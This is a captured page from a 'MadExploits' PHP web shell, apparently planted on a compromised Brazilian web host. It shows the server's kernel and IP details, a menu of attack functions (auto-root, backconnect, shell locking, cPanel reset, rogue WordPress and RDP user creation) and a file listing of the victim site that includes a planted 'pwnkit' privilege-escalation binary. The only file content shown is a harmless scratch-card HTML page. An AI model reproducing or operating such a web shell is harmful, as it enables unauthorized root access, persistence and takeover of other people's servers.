Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
roletalider /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
back
[ DIR ]
drwxr-xr-x
contactform
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
img10
[ DIR ]
drwxr-xr-x
img11
[ DIR ]
drwxr-xr-x
img2
[ DIR ]
drwxr-xr-x
img3
[ DIR ]
drwxr-xr-x
img4
[ DIR ]
drwxr-xr-x
img5
[ DIR ]
drwxr-xr-x
img6
[ DIR ]
drwxr-xr-x
img7
[ DIR ]
drwxr-xr-x
img8
[ DIR ]
drwxr-xr-x
img9
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
.htaccess
2
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
conexao.php
17.25
KB
-rw-r--r--
contato.php
17.55
KB
-rw-r--r--
footer.php
19.35
KB
-rw-r--r--
header2.php
18.07
KB
-rw-r--r--
header3.php
22.08
KB
-rw-r--r--
index.php
15.75
KB
-rw-r--r--
index3.html
2.79
KB
-rw-r--r--
index_04-16-17-30.php
32.9
KB
-rw-r--r--
index_teste.php
15.75
KB
-rw-r--r--
indexold.php
31.2
KB
-rw-r--r--
link.html
131.96
KB
-rw-r--r--
login.php
44.5
KB
-rw-r--r--
loginteste.php
37.53
KB
-rw-r--r--
logout.php
15.79
KB
-rw-r--r--
modalidades.php
31.83
KB
-rw-r--r--
postnews.php
5.1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
quiz.php
30.77
KB
-rw-r--r--
redir_insta.php
19.39
KB
-rw-r--r--
register.php
21.91
KB
-rw-r--r--
register_insta.php
23.31
KB
-rw-r--r--
teste-erick.html
368
B
-rw-r--r--
user.php
25.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index3.html
<!DOCTYPE html> <html lang="pt"> <head> <title>Raspadinha!!</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width" /> <script type="text/javascript" src="./lib/jquery.1.11.0.min.js"></script> <style> .raspadinha{ position: relative; border: 1px solid #123; /* max-width: 100vw; */ width: 1326px; height: 614px; } .raspadinha > img:first-child{ width: 100%; } .raspadinha > div:first-child{ position: absolute; width: 53.01%; height: 74.1%; /* top: 94px; left: 571px; */ top: 15.3%; left: 43.06%; } .raspavel{ background-color: gray; width: 300px; height: 150px; } .raspe{ width: 100%; height: 100%; } </style> </head> <body> <div class="raspadinha"> <div class="raspavel"> <div id="demo" class="raspe"></div> </div> <img src="images/raspinha.png" /> </div> <br /> <br /> <hr /> <div id="content"> <h1 id="plugin-name">wScratchPad.js</h1> <div class="content-box"> <div id="demo1" class="scratchpad"></div> <div id="demo1-percent"> </div> <input type="button" value="Resetar" onclick="$('#demo1').wScratchPad('reset');" /> <input type="button" value="Limpar" onclick="$('#demo1').wScratchPad('clear');" /> <input type="button" value="Enable" onclick="$('#demo1').wScratchPad('enable', true);" /> <input type="button" value="Disable" onclick="$('#demo1').wScratchPad('enable', false);" /> <hr /> <div id="demo2" class="scratchpad"></div> <div id="demo2-percent"> </div> <input type="button" value="Resetar" onclick="$('#demo2').wScratchPad('reset');" /> <input type="button" value="Limpar" onclick="$('#demo2').wScratchPad('clear');" /> <input type="button" value="Enable" onclick="$('#demo2').wScratchPad('enable', true);" /> <input type="button" value="Disable" onclick="$('#demo2').wScratchPad('enable', false);" /> <style> .scratchpad { width: 50px; height: 50px; border: solid 1px; } </style> <script type="text/javascript" src="./wScratchPad.min.js"></script> <script type="text/javascript"> $('#demo').wScratchPad({ bg: './images/televisao.png', 'cursor': 'pointer 5 5, default', size: 20, scratchMove: function(e, percent) { $('#demo1-percent').html(percent); } }); $('#demo1').wScratchPad({ bg: './images/televisao.png', 'cursor': 'pointer 5 5, default', size: 20, scratchMove: function(e, percent) { $('#demo1-percent').html(percent); } }); $('#demo2').wScratchPad({ bg: './images/denovo.png', fg: './images/raspe.png', size: 20, scratchMove: function(e, percent) { $('#demo2-percent').html(percent); if (percent > 70) { this.clear(); } } }); </script> </div> </div> </body> </html>
Close